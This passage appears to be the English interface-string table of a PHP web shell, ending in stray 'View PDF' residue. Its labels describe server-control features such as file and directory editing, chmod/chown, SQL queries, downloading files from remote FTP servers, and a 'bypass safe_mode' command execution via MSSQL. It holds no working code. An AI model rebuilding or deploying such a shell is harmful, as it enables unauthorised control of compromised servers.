temp files','eng_butt11'='Edit file','eng_text49'='Delete script from server','eng_text50'='View cpu info','eng_text51'='View memory info','eng_text52'='Find text','eng_text53'='In dirs','eng_text54'='Find text in files','eng_butt12'='Find','eng_text55'='Only in files','eng_text56'='Nothing (','eng_text57'='CreateDelete FileDir','eng_text58'='name','eng_text59'='file','eng_text60'='dir','eng_butt13'='CreateDelete','eng_text61'='File created','eng_text62'='Dir created','eng_text63'='File deleted','eng_text64'='Dir deleted','eng_butt65'='Create','eng_text65'='Create','eng_text66'='Delete','eng_text67'='ChownChgrpChmod','eng_text68'='Command','eng_text69'='param1','eng_text70'='param2','eng_text71'=Second commands param isrn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...,'eng_text72'='Text for find','eng_text73'='Find in folder','eng_text74'='Find in files','eng_text75'=' you can use regexp','eng_text76'='Search text in files via find','eng_text80'='Type','eng_text81'='Net','eng_text82'='Databases','eng_text83'='Run SQL query','eng_text84'='SQL query','eng_text85'='Test bypass safe_mode with commands execute via MSSQL server','eng_text86'='Download files from server','eng_butt14'='Download','eng_text87'='Download files from remote ftp-server','eng_tex

View PDF